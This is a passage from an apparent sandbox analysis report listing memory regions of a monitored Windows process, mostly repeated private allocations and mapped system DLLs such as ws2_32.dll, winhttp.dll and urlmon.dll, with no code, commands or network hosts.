"private_0x0000000000160000" filename = "" Region: id = 3631 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3632 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3633 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3634 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3635 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3636 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3637 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3638 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3639 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3640 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3641 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3642 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3643 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3644 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3645 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3646 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3647 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3648 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3649 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3650 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3651 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3652 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3653 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3654 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3655 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3656 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3657 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3658 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3659 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3660 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3661 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3662 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3663 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3664 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3665 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3666 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3667 start_va = 0x160000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3668 start_va = 0x71cf0000 end_va = 0x71fbafff monitored = 0 entry_point = 0x71f2c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3669 start_va = 0x7870000 end_va = 0x78affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007870000" filename = "" Region: id = 3670 start_va = 0x78b0000 end_va = 0x78effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078b0000" filename = "" Region: id = 3671 start_va = 0x78f0000 end_va = 0x7c26fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3672 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3673 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3674 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3675 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3676 start_va = 0x76c90000 end_va = 0x76ceefff monitored = 0 entry_point = 0x76c94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3677 start_va = 0x70370000 end_va = 0x70381fff monitored = 0 entry_point = 0x70374510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3678 start_va = 0x71b70000 end_va = 0x71b9efff monitored = 0 entry_point = 0x71b7bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3679 start_va = 0x702d0000 end_va = 0x7036afff monitored = 0 entry_point = 0x7030f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3680 start_va = 0x71c70000 end_va = 0x71cbefff monitored = 0 entry_point = 0x71c7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3681 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3682 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3683 start_va = 0x702c0000 end_va = 0x702c7fff monitored = 0 entry_point = 0x702c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3684 start_va = 0x76560000 end_va = 0x76566fff monitored = 0 entry_point = 0x76561e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3685 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3686 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3687 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3688 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3689 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3690 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3691 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3692 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3693 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3694 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3695 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3696 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3697 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3698 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3699 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3700 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3701 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3702 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3703 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3704 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3705 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3706 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3707 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3708 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3709 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3710 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3711 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3712 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3713 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3714 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3715 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3716 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3717 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3718 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3719 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3720 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3721 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3722 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3723 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3724 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3725 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3726 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3727 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3728 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3729 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3730 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3731 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3732 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3733 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3734 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3735 start_va = 0x7c30000 end_va = 0x7c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c30000" filename = "" Region: id = 3736 start_va = 0x7c70000 end_va = 0x7caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c70000" filename = "" Region: id = 3737 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3738 start_va = 0x76730000 end_va = 0x767b3fff monitored = 0 entry_point = 0x76756220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3893 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3894 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3895 start_va = 0x7cb0000 end_va = 0x7ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cb0000" filename = "" Region: id = 3896 start_va = 0x7cf0000 end_va = 0x7d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cf0000" filename = "" Region: id = 3897 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3898 start_va = 0x71be0000 end_va = 0x71c63fff monitored = 0 entry_point = 0x71c06530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3899 start_va = 0x705b0000 end_va = 0x7072dfff monitored = 0 entry_point = 0x7062c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3900 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3901 start_va = 0x71b10000 end_va = 0x71b17fff monitored = 0 entry_point = 0x71b11920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 3902 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3903 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3904 start_va = 0x71b20000 end_va = 0x71b66fff monitored = 0 entry_point = 0x71b358d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 3905 start_va = 0x73e30000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73e39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3906 start_va = 0x1d0000 end_va = 0x1d7fff monitored = 0 entry_point = 0x1d19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 3907 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3908 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3910 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3911 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3912 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3913 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3914 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3915 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3916 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3917 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3918 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3919 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3920 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3921 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3922 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3923 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3924 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3925 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3926 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3927 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3928 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3929 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3930 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3931 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3932 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3933 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3934 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3935 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3936 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3937 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3938 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3939 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3940 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3941 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3942 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3943 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3944 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3945 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3946 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3947 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3948 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3949 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3950 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3951 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3952 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3953 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3954 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3955 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3956 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3957 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3958 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3959 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3960 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3961 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3962 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3963 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3964 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3965 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3966 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3967 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3968 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3969 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3970 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3971 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3972 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3973 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3974 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3975 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3976 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3977 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3979 start_va = 